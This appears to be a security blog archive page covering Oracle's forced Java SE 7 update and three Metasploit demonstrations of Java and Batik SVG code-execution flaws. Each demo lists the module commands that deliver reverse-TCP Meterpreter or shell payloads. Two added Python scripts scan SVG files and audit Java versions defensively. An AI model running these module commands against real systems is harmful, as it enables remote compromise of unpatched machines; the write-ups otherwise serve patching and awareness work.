Tag Archives: Java

Oracle Push Java SE 7 Update to Uninstall Version 6

The last release of Java SE 6, version 6 update 33 (1.6.0_33-b03), was published on 12 Jun 2012 as part of the quarterly Oracle Java CPU (Critical Patch Update). This CPU fixed 14 security vulnerabilities in the JSE product versions 7, 6, 5 and 4. One of these vulnerabilities was CVE-2012-1723, which is currently used in the Blackhole exploit kit.

Metasploit exploitation demonstration of CVE-2012-1723

For a few days now you may have seen a notification on your system asking you to update Java.

Looking at the details of the update, you will see that Java SE 7 update 5 (1.7_5) is available and that installing it will remove your previous version of JSE. However, if you wish to keep Java 6, you will need to update using the offline Java installer to the latest version of JSE, which is version 7 update 5. Huh! What a choice: I have to update to version 7, or update to version 7.

As you may know, Java SE 6 will no longer be supported after November 2012. The last Java CPU update is planned for 2012, October 12. After November 2012, Oracle will no longer post updates of Java SE 6 to its public download sites. For enterprise customers who need continued access to critical bug fixes and security fixes as well as general maintenance for Java SE 6 or older versions, long-term support is available through Oracle Java SE Support. But it seems, through this forced Java SE update to version 7, that Java SE 6 update 33 was the last one.

So we encourage you to plan a mega release on your infrastructures, because Java SE 6 seems to be officially dead!

CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Timeline :

Public release of the vulnerability on 2012-06-12
First PoC provided by Michael Schierl on 2012-06-13
Metasploit PoC provided on 2012-07-09

PoC provided by :

Stefan Cornellius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java JSE 7 Update 4 and before
Oracle Java JSE 6 Update 32 and before
Oracle Java JSE 5 Update 35 and before
Oracle Java JSE 1.4.2_37 and before

Tested on Windows XP Pro SP3 with :

Oracle JSE 1.6.0_32-b05

Description :

This module exploits a vulnerability in the HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Squiggle 1.7 SVG Browser Java Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Nicolas Gregoire
Details of the vulnerability provided by Nicolas Gregoire on 2012-05-11
Metasploit PoC provided on 2012-05-17

PoC provided by :

Nicolas Gregoire
sinn3r
juan vazquez

Reference(s) :

http://www.agarri.fr/blog/

Affected version(s) :

Squiggle Browser 1.7
Batik framework 1.7

Tested on Mac OS X 10.7.1 with :

Squiggle Browser 1.7

Description :

This module abuses the SVG support to execute Java code in the Squiggle Browser included in the Batik framework 1.7 through a crafted SVG file referencing a jar file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) it must support at least SVG version 1.1 or newer, (2) it must support Java code and (3) the “Enforce secure scripting” check must be disabled. The module has been tested against Windows and Linux platforms.
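As an added example (not part of the original post, of Metasploit or of Batik), a small Python detector a defender can run over SVG files before they reach a Squiggle install with secure scripting disabled: it reports every script element and singles out those that reference a jar, using Batik's documented jar script type, which is assumed here as the detection key. The two SVG samples are constructed.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Batik's script type for Java archives (taken from the Batik documentation and
# assumed here as the detection key). Tags are compared by local name so that
# SVG documents with or without a default namespace are both covered.
JAR_SCRIPT_TYPE = "application/java-archive"
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"

def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]

def scan_svg(svg_text: str) -> List[Dict[str, str]]:
    """Return one finding per <script> element in the SVG.

    severity 'jar'   : the script is a jar (by type or by an .jar href), the
                       pattern this page's module relies on;
    severity 'script': any other script element, worth a look whenever
                       "Enforce secure scripting" is disabled.
    """
    root = ET.fromstring(svg_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "script":
            continue
        href = el.get(XLINK_HREF) or el.get("href") or ""
        stype = (el.get("type") or "").strip().lower()
        is_jar = stype == JAR_SCRIPT_TYPE or href.lower().endswith(".jar")
        findings.append({"severity": "jar" if is_jar else "script",
                         "type": stype, "href": href})
    return findings

def jar_references(svg_text: str) -> List[str]:
    """Hrefs of every jar-type script; an empty list means no jar is referenced."""
    return [f["href"] for f in scan_svg(svg_text) if f["severity"] == "jar"]

# Constructed samples: a plain drawing and a document that references a jar.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="blue"/></svg>"""
JAR_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <script type="application/java-archive" xlink:href="http://example.invalid/code.jar"/>
  <rect width="10" height="10"/></svg>"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_SVG), ("jar", JAR_SVG)):
        print(name, jar_references(doc) or "no jar referenced")
```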

Commands :

use exploit/multi/misc/batik_svg_java
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo

Timeline :

Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters on 2011-08-01
Coordinated public release of the vulnerability on 2012-02-14
Details of the vulnerability published by Jeroen Frijters on 2012-02-23
Metasploit PoC provided on 2012-03-29

PoC provided by :

Jeroen Frijters
sinn3r
juan vazquez
egypt

Reference(s) :

CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before
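As an added example (not part of the original posts or of Metasploit), a small Python audit that parses the Java version strings quoted on this page (1.6.0_33-b03, 1.6.0_32-b05, 1.4.2_37, 1.7_5) and checks them against the affected ranges listed above for CVE-2012-1723 and in this list for CVE-2012-0507; the host inventory is constructed.

```python
import re
from typing import Dict, List, Tuple

# Last affected update per Java family, taken from the "Affected version(s)"
# lists on this page ("Update N and before"); 1.4.2_37 is family 4.
LAST_AFFECTED: Dict[str, Dict[int, int]] = {
    "CVE-2012-1723": {7: 4, 6: 32, 5: 35, 4: 37},
    "CVE-2012-0507": {7: 2, 6: 30, 5: 33},
}

# 1.<family>[.<minor>][_<update>][-b<build>], e.g. 1.6.0_32-b05, 1.4.2_37, 1.7_5
_VERSION_RE = re.compile(r"^1\.(\d+)(?:\.(\d+))?(?:_0*(\d+))?(?:-b\d+)?$")

def parse_java_version(s: str) -> Tuple[int, int]:
    """Return (family, update) for a 1.x-style Java version string.

    Handles the forms quoted on this page: '1.6.0_33-b03', '1.6.0_32-b05',
    '1.4.2_37' and the shorthand '1.7_5'. No update number means update 0.
    """
    m = _VERSION_RE.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised Java version string: {s!r}")
    return int(m.group(1)), int(m.group(3) or 0)

def vulnerable_to(version: str) -> List[str]:
    """CVEs from this page whose affected range still includes `version`.

    A family an advisory does not list (Java 1.4.2 for CVE-2012-0507) is
    treated as not affected by it, exactly as the page's list reads.
    """
    family, update = parse_java_version(version)
    return sorted(cve for cve, per_family in LAST_AFFECTED.items()
                  if family in per_family and update <= per_family[family])

def audit(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """host -> outstanding CVEs, for a constructed host -> version inventory."""
    return {host: vulnerable_to(v) for host, v in inventory.items()}

if __name__ == "__main__":
    # Constructed inventory; the version strings are the ones quoted on this page.
    sample = {
        "lab-xp-01": "1.6.0_32-b05",  # JRE the CVE-2012-1723 demo was run against
        "lab-xp-02": "1.6.0_33-b03",  # last Java SE 6 release: patched
        "build-01": "1.7_5",          # Java SE 7 Update 5: patched
        "legacy-01": "1.4.2_37",
    }
    for host, cves in audit(sample).items():
        print(f"{host}: {', '.join(cves) or 'not affected by the CVEs on this page'}")
```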

Tested on Windows XP Pro SP3 with :

Oracle Java SE 6 Update 16
Internet Explorer 8

Description :

This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_atomicreferencearray
set SRVHOST 192.168.178.100
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.178.100
exploit